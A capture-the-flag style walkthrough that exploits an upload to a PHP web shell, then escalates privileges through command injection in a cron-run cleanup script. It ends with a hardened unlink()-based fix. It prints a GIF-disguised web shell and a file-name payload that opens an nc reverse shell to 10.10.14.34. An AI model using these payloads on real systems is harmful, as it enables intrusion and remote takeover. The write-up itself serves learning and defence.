# Exploitation

## Executing Code

```php
GIF87a
<?php system($_GET['cmd']); ?>
```

![Intercepting and sending to repeater](/files/-MJ51lZSoSEiBCl983_p)

![](/files/-MJ51c6vhHmHKbZ1-wY8)

## Reverse Shell

![](/files/-MJ56XisWNsYRQVaqxuE)

![](/files/-MJ57EyBFAJsquFoA9eM)

## Privilege Escalation

### Found crontab

![we can't write since we are not root or guly, we can only read check\_attack.php and the crontab](/files/-MJ7bn3ARDldalRdVm9h)

![the crontab executes check\_attack.php every 3 minutes](/files/-MJ7c5tWLtEDXzWa7dwT)

**Since we cannot write into these files, let's read check\_attack.php**

```
bash-4.2$ cat check_attack.php
<?php
require '/var/www/html/lib.php';
$path = '/var/www/html/uploads/';
$logpath = '/tmp/attack.log';
$to = 'guly';
$msg= '';
$headers = "X-Mailer: check_attack.php\r\n";

$files = array();
$files = preg_grep('/^([^.])/', scandir($path));

foreach ($files as $key => $value) {
        $msg='';
  if ($value == 'index.html') {
        continue;
  }
  #echo "-------------\n";

  #print "check: $value\n";
  list ($name,$ext) = getnameCheck($value);
  $check = check_ip($name,$value);

  if (!($check[0])) {
    echo "attack!\n";
    # todo: attach file
    file_put_contents($logpath, $msg, FILE_APPEND | LOCK_EX);

    exec("rm -f $logpath");
    exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
    echo "rm -f $path$value\n";
    mail($to, $msg, $msg, $headers, "-F$value");
  }
}

?>
```

Analyzing this script, it looks for files that aren't supposed to be in the uploads directory and deletes them. But pay attention to how it deletes them: it appends the file name to the *rm* command without any filtering, which makes it vulnerable to command injection:

```php
exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
```

`$path` is the value of the upload directory:

```php
$path = '/var/www/html/uploads/';
```

`$value` is the suspicious file's name.

By going into /var/www/html/uploads, we can create a file that holds the payload in its name. If we start the file name with a semicolon (;), it will end the rm command and execute whatever code we put after it.

![demonstrates how file.txt is deleted after three minutes](/files/-MJ7fGLylr735ispBDE_)

```bash
touch '; nc 10.10.14.34 4444 -c bash'
```

Since the script appends the name of the file, we create the above file with a name beginning with `; nc`. The semicolon ends the rm command, and everything after it is executed as a separate command.

![](/files/-MJ7hxgx35I4vvib6knc)

![](/files/-MJ8MxucnRABZhuLJiiQ)

![](/files/-MJ8MqQqHnv4COalagxq)
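The root cause above is that a file name is concatenated into a shell command line. As an added example (not the box's script), here is a hardened version of the deletion step that never touches a shell: it validates that the name is a plain entry inside the uploads directory and then calls `unlink()`, so metacharacters in the name are just characters. The helper name `safe_remove_upload` and the temporary directory used for the demonstration are assumptions.

```php
<?php
// Added example: delete a suspicious upload without invoking a shell.
// Returns true when the file was removed, false when the name was rejected.
function safe_remove_upload(string $uploadDir, string $name): bool
{
    // Accept only a bare file name: no path separators, no NUL byte, no dot-prefix
    // (mirrors the preg_grep('/^([^.])/') filter in the original script).
    if ($name === '' || $name !== basename($name) || $name[0] === '.' || strpos($name, "\0") !== false) {
        return false;
    }
    $dirReal = realpath($uploadDir);
    if ($dirReal === false) {
        return false;
    }
    $target = $dirReal . DIRECTORY_SEPARATOR . $name;
    // Refuse symlinks and anything that does not resolve to a regular file
    // directly inside the uploads directory.
    if (is_link($target) || !is_file($target) || dirname(realpath($target)) !== $dirReal) {
        return false;
    }
    // unlink() receives the path as data; "; nc ..." in the name is never parsed by sh.
    return unlink($target);
}

// Constructed demonstration in a throwaway directory (assumed layout, not the box's).
$tmp = sys_get_temp_dir() . '/uploads_' . bin2hex(random_bytes(4));
mkdir($tmp, 0700);
$hostile = '; echo injected';           // same shape as the file name abused above
touch("$tmp/$hostile");
touch("$tmp/benign.txt");

if (!safe_remove_upload($tmp, $hostile) || file_exists("$tmp/$hostile")) {
    throw new RuntimeException('hostile name should have been removed as a plain file');
}
if (safe_remove_upload($tmp, '../passwd') || safe_remove_upload($tmp, '.htaccess')) {
    throw new RuntimeException('traversal and dotfile names should be rejected');
}

// Cleanup.
unlink("$tmp/benign.txt");
rmdir($tmp);
echo "ok\n";
```

Running the script under `php` should print `ok` and leave nothing behind in the temporary directory; the same check applies if `exec()` is ever unavoidable, in which case the name must at least pass through `escapeshellarg()`.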

